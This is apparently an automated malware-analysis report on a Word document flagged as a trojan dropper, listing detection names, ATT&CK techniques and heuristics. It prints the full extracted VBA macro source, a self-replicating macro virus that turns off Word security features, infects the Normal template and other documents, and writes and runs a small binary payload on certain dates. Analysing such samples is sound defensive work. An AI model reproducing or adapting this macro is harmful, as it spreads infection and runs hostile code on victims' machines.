MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1564.004 Disable or Modify Tools
The sample contains VBA macros that attempt to disable security features and execute a file named 'C:\�.COM' using the Shell() function. This behavior is indicative of a trojan dropper. The ClamAV detection name 'Win.Trojan.Psycho-3' further supports this classification.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2465 bytes |
SHA-256: 433d950e33c183dc9b1860eca460ebaea3e4b8c17cc3a52a1bb8c9dbbf07a142 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Spoony
Private Declare Function SystemParametersInfoA Lib "user32" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Sub Document_Close(): Dim ν As Byte
On Error Resume Next
υ = ActiveDocument.Saved
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Application.DisplayAlerts = 0
Options.ConfirmConversions = 0
Application.EnableCancelKey = 0
SystemParametersInfoA 97, 1, "", 0
CustomizationContext = MacroContainer
CommandBars("Control Toolbox").Enabled = 0
CommandBars("Tools").Controls(12).Visible = 0
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
If Month(Now) Like Day(Now) Or Day(Now) Like WeekDay(Now) Then _
κ = Array(&HFA, &H33, &HC9, &H8B, &HD1, &HFE, &HC1, &H80, &HD6, &H0, &HA, &HC9, &H75, &H2, &HFE, &HC1, &HB2, &H80, &HB8, &H1, &H3, &H9A, &HEE, &H3, &H70, &H0, &HEB, &HE9): _
Open "C:\�.COM" For Binary As #1: For ι = 0 To 27: ν = κ(ι): Put #1, ι, ν: Next: Close: Shell "C:\�.COM", 0
If GetAttr(NormalTemplate.FullName) Mod 2 Then SetAttr NormalTemplate.FullName, 0
If GetSetting("'", "'", "'") Like "" Then SaveSetting "'", "'", "'", ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 50)
If GetAttr(NormalTemplate.FullName) Then
With NormalTemplate.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
End If: End With: End If
If Len(ActiveDocument.Path) Then
With ActiveDocument.VBProject
If Not .Protection And .HelpContextID <> 7 Then
.VBComponents(1).CodeModule.DeleteLines 1, .VBComponents(1).CodeModule.CountOfLines
.VBComponents(1).CodeModule.AddFromString GetSetting("'", "'", "'")
.HelpContextID = 7
If Not ActiveDocument.ReadOnly Then ActiveDocument.SaveAs ActiveDocument.FullName
End If: End With: End If
SystemParametersInfoA 97, 0, "", 0
ActiveDocument.Saved = υ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.